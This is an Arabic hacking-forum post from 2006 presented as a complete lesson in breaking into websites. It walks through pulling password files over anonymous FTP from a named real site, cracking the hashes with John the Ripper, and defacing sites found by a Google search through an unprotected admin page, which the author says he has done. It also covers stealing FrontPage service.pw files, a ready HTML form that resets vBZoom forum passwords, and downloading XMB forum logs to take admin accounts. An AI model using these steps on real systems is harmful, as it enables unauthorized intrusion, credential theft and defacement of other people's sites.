درس هام وقوي لجميع طرق اختراق المواقع
--------------------------------------------------------------------------------
بسم الله الرحمن الرحيم
><>< وما اوتيم من العلم الا قليلا ><><
صدق الله العظيم
اخوانى واحبائى فى الله وفى المنتدى الكريم اسعد الله وقتكوم باختراقات موفقه
اليوم راح نتكلم عن تعليم اختراق المواقع للمبتدئين والمحترفين فى الاختراق
نبداء بشرح الثغره وكيف معناها موافقين انشاء الله
كاتب الموضوع الاصلى الوطواط الاحمر Mr>>ReD BaT ><>< ><><><
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
بسم الله الرحمن الرحيم
وقل ربى زدنى علما
صدق الله العظيم !!
الكاتب !! الوطواط الاحمر
بسم الله """"
اولا يا شباب يعنى ايه ثغره وكيف تتطبقها وطيف تعرف ان الموقع يدعم بثغره
اسئله تدور فى ذهننا فلكى تعرف فتابع هاد الشرح مع التطيبق
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!
" الثغرات "
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User name-Password
وهما يكونان محفوظين في ملف يسمي
PASSWDغالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host Name مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
pass
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها
الاختراق من الإف تي بي أصبحت طريقة قديمة لذا لن تجد موقعا حديثايضع ملف الباسوورد في إف تي بي ذكرنها فقط كمقدمة..إذا أردت تجريبها جربها على هذا الموقع
ftp.pangeia.com.br
ولزيادة معلوماتك عن الاختراق بالف تي بي قم بتحميل الملف الموجود بنهاية الصفحة
وبعدها؟؟المشوار مازال طويلا...كلمة السر ستكون مشفرة وسنشرح كيقية كسرها في النهاية....
--------------------------------------------------------------------------------
Exploit = اسثمار = ثغرة
الجزء المهم:
الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغلالها للحصول على ملف الباسوورد وقاعدة البيانات وووو..إلخ
أولا يجب أن تجمع كل المعلومات الممكنة حول الموقع :
1- المنافذ المفتوحة مثل الإف تي بي والتلنت مثلا وهذ عن طريق برامج مثل
super scan
ابحث عنه في الانترنت.
2- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لآخر.
لمعرفة نظام التشغيل إذهب إلى الموقع
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كلآيبي ونظام التشغيل...إلخ
3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك
4- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي
أنواع الثغرات
أبسط الأنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
والأنواع الباقية أو الاستثمارات :
ثغرات مكتوبة بلغة بيرل *.pl
ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج
Active Perl
ثغرات بلغة سي
*.c يمكن استخدامها في لينوكس فقط
ثغرات بلغة شل
*.shويمكن استثمارها في لينوكس فقط
ويمكنك إيجاد الكثير من الأنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.
ويمكنك من خلال البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك بحث أو حتى عداد زوار
حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed أو مشفرة encryption.
مثال لملف باسوورد
root:x:0
Super-User:/:/sbin/sh daemon:x
1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x
4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
ولأن ملف الباسوورد يحتوي على كلمات سر الأشخاص المرخص لهم بدخول الموقع قد لا بزيد عن عشرة أسطر وقد يصل آلاف الأسطر...
كلمات السر السابقة مضللة وهي علامة xوقد تختلف..
أما المشفرة والتي سنحصل عليها تكون هكذا:
مضللة root:x:0
Super-User:/:/sbin/sh
مشفرة root:Q71KBZlvYSnVw:0
Super-User:/:/sbin/sh
root = أو الجذر اسم المستخدم
x = كلمةالسر ولكنها مضللة
وباقي السطر غير مهم
في الأغلب ستكون كلمة السر مضللة shadowed لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر مشفرة يسمى ملف الشادو
shadow file
ويوجد في أماكن معينة تختلف باختلاف نظام التشغيل
token = الرمز الذي يعبر عن الباسوورد
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
مثال لملف شادو
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::
نجد أن كلمة السر هي
EpGw4GekZ1B9U
كيف تفك التشفير؟
عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات
John the ripper
وهو يقوم بتجريب كل المحاولات الممكنة حتى يحصل على الباسوورد .
ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثلا وعليك وضع الكلمة المشفرة بدلا من الx وعليك ترتيبها بحيث يكون كل حساب في سطر
طريقة تشغيله:
إذهب إلى الدوس واكتب
john passwd
حيث passwd هو الملف الذي به الباسوورد المشفرة وضعتها
سيظهر :
by Sola 97,John the Ripper Version 1.3 Copyright © 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
وإذا أردت معرفة الباسوورد التي يخمنها الآن اضغط انتر
والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه
john.pot
وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه
وفى النهايه ارجو الاستفاده من هاد الموضوع
جميع الحقوق محفوظه لدى
الوطواط الاحمر
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
الدرس الثانى ><><><
][®][^][®][][®][^][®][
وهوا ثغرات المواقع ونبداء من اول ثغراته ونبدء باولال الثغرات
~!~ ثغرة سباق المواقع ~!~
=====================
أولا إذهب إلى أي محرك بحث .. مثلا GOOGLE
وإكتبtop_list/list.php3
رح تلقى الكثير من المواقع ورح يكون اخر الموقع كدا
top_list/list.php3
مثلا هذا الموقع
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
وكذا يكون دخلنا صفحة سباق المواقع
قم بمسح هذا "list.php3" وبدله بـ
admin/updates_admin.php3
سيصبح عنوان الموقع هكذا
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
إدخل على هذا العنوان
ومن ثم سيظهر لك مربع
قم بالذهاب الى الفرونت بيج واكتب الي تبيه مثلا
HACKED BY ALNOR3S
وثم اذهب من الفرونت بيج الى خانة HTML
وانسخ مابداخله بالكامل وضعه في المربع الي في هذا العنوان
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
عد كذا اضغط رفع ليرفع الكلام الي الصفحة
ادخل الى الموقع
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
وشوف توقيعك الي سويته في الفرونت بيج
==================
عيب هذه الثغرة ان اي واحد يعرف الثغرة يقدر يخترق بعدك ...
وهذا الموقع تم اختراقه من قبلى
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغرة الفرنت بيج
السلام عليكم شباب , الفرونت بيج يعتبر من اهم البرامج في انشاء المواقع , ولكن يوجد به ثغرة قويه تمكنك من اختراق موقع الضحيه وامتلاكه
وسوف اقوم بعرض هذهي الثغره بشكل مبسط
نبدا :
اول شي لازم تعرف اذا الموقع يدعم الفرونت بيج وله لا
روح على هذا الموقع
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] واكتب اسم الموقع وستجد معلومات عن الموقع , ومن بينها اذا كان يدعم الفرونت بيج وله لا .
شرح الثغرة :
الفرونت بيج عند تنصيبه يقوم باقامة فولدرات وهي :
/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt (اخطرهم )
/_vti_txt
ولتطبيق الثغره , اكتب اسم الموقع في المتصفح وبعدين اكتب وراه الثغره
مثال : /http://xxxx.com/_vti_pvt
او يمكنك استخدام برامج البحث عن ثغرات المواقع , و الي من اهمها برنامج عمران omran scan
اوكيه بعد هذي الخطوه بتدخل على الفولدر الي كتبناه (_vit_pvt_/)
وداخله بتحصل ملف مهم جدا باسم service.pw
هذا الملف يحتوي على باسورد صاحب الموقع ولكنه مشفر بمقياس des
ولفك الشفره بنستخدم برنامج john de ripe
حمل الملف السابق service.pw على جهازك وافتح الملف بواسطة برنامج john de ripe , الي يعتمد على تحويل الملف من encypretd الى plan text
يعنى تحويل الكلمه المشفره الى كلمه عاديه .
وبعد ما تفك الشفره خلاص صار الباسورد في ايدك وتستطيع التحكم بالموقع عن طريق الفرونت بيج او رفعه ببرامج ال ftp .
اتمنى انكم استفدتو , وانكم ما تستخدمون الطريقة في اذيت اخوانكم المسلمين .
وهذا برنامج john de riper
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغرة منتديات vbzoom
إفتح المفكرة وضع هذا الكود
<form name="f1" action="http://www.domin.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForum****iesUserName" value="false">
<input type="hidden" name="VBZooMForum****iesUserName" value="false">
<input type="submit" value="reset password">
</form
*غيرdomin.com إلى عنوان الموقع
إحفظ الكود بإمتداد html
إفتح الملف بعد حفظه
تجد ثلاث فراغات
1_ضع فيه إسم مستخدم (*مثال:الملثم*)
2_ضع الباسوورد
3_ضع إيميلك
---------------------------------------------------------
روح لهذا العنوان
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
مع تغيير domin.com إلى عنوان الموقع
----------------------------------------------------------
المنتدى بين يديك
--------------------------------------------------------------
ثغره اخرى في المنتديات
ثغرة جديدة في منتديات من نوع XMB
الشرح والتطبيق
1- عليك بالذهاب الى موقع جوجل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك زي
كده مثلا::
xmbuser=admin
واباس راح تلقاه قدامه زي كده
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
9- اعدادت البرنامج كتالي في الصورة:
رقم (1) قم بوضع علامة صح.
رقم (2) قم بوضع اسم العضو سواء مدير او غيره
رقم (3) قم بوضع الباس المشفر حق العضو او المدير او غيره
رقم (4) قم بوضع علامة صح.
رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك
رقم (6) قم بوضع المنفذ حق البروكسي
10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات>
قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080
11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المديرتبع المنتدى
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
21-12-2006, 02:29 AM
درس هام وقوي لجميع طرق اختراق المواقع 
المواضيع المتشابهه 
العرض العادي
